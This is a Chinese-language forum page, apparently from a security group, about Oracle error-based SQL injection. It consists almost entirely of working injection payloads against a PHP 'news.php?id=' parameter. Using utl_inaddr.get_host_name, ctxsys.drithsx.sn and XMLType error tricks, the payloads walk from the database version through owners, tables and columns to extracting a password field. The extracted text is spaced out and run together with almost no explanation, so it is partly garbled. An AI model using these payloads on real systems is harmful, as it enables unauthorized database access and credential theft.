[20840] 2017-08-04_ORACLE报错注入

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2017-08-04_ORACLE报错注入 O R A C L E   l e m o n   L e m o n S e c   2 0 1 7 - 0 8 - 0 4 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e         h t t p : / / w w w . x x o x . c n / m i c k e y / n e w s . p h p ? i d = 2 5 1 9 0 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) ) s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1 s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1 ) ) s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S '
s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S ' ) ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S T E M ' ) ) ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 ) )
( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1   a n d   t a b l e _ n a m e > ' A Q $ _ I N T E R N E T _ A G E N T S ' )       p s . ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d r o w n u m = 1 ) )
( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d   c o l u m n _ n a m e > ' i d '   a n d   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d c o l u m n _ n a m e > ' i d '   a n d   r o w n u m = 1 ) ) ( s e l e c t   " p a s s w o r d "   f r o m   " p s "   w h e r e   " i d " = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2 | | u t l _ i n a d d r . g e t _ h o s t _ n a m e ( ( s e l e c t   " p a s s w o r d "   f r o m   " p s "   w h e r e   " i d " = 1 ) )

c t x s y s . d r i t h s x . s n       h t t p : / / w w w . x x o x . c o m / m i c k e y / n e w s . p h p ? i d = 2 5 1 9 0   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e r o w n u m = 1 ) ) ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n   w h e r e   r o w n u m = 1 ) ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = c t x s y s . d r i t h s x . s n ( 1 , ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1 ) )
( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S ' ) ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 )
( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d   r o w n u m = 1 ) ( s e l e c t   " p a s s w o r d "   f r o m   " p s "   w h e r e   " i d " = 1 )
        h t t p : / / w w w . x x o x . c n / m i c k e y / n e w s . p h p ? i d = 2 5 1 9 0   a n d   a n d ( 1 ) = ( s e l e c t   u p p e r ( X M L T y p e ( c h r ( 6 0 ) | | c h r ( 5 8 ) | | c h r ( 5 8 ) | | ( s e l e c t   r e p l a c e ( b a n n e r , c h r ( 3 2 ) , c h r ( 5 8 ) )   f r o m s y s . v _ $ v e r s i o n   w h e r e   r o w n u m = 1 ) | | c h r ( 6 2 ) ) )   f r o m   d u a l ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d ( 1 ) = ( s e l e c t   u p p e r ( X M L T y p e ( c h r ( 6 0 ) | | c h r ( 5 8 ) | | c h r ( 5 8 ) | | ( s e l e c t r e p l a c e ( b a n n e r , c h r ( 3 2 ) , c h r ( 5 8 ) )   f r o m   s y s . v _ $ v e r s i o n   w h e r e   r o w n u m = 1 ) | | c h r ( 6 2 ) ) )   f r o m   d u a l ) ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d ( 1 ) = ( s e l e c t   u p p e r ( X M L T y p e ( c h r ( 6 0 ) | | c h r ( 5 8 ) | | c h r ( 5 8 ) | | ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e r o w n u m = 1 ) | | c h r ( 6 2 ) ) )   f r o m   d u a l )
( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d ( 1 ) = ( s e l e c t   u p p e r ( X M L T y p e ( c h r ( 6 0 ) | | c h r ( 5 8 ) | | c h r ( 5 8 ) | | ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e r o w n u m = 1 ) | | c h r ( 6 2 ) ) )   f r o m   d u a l )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则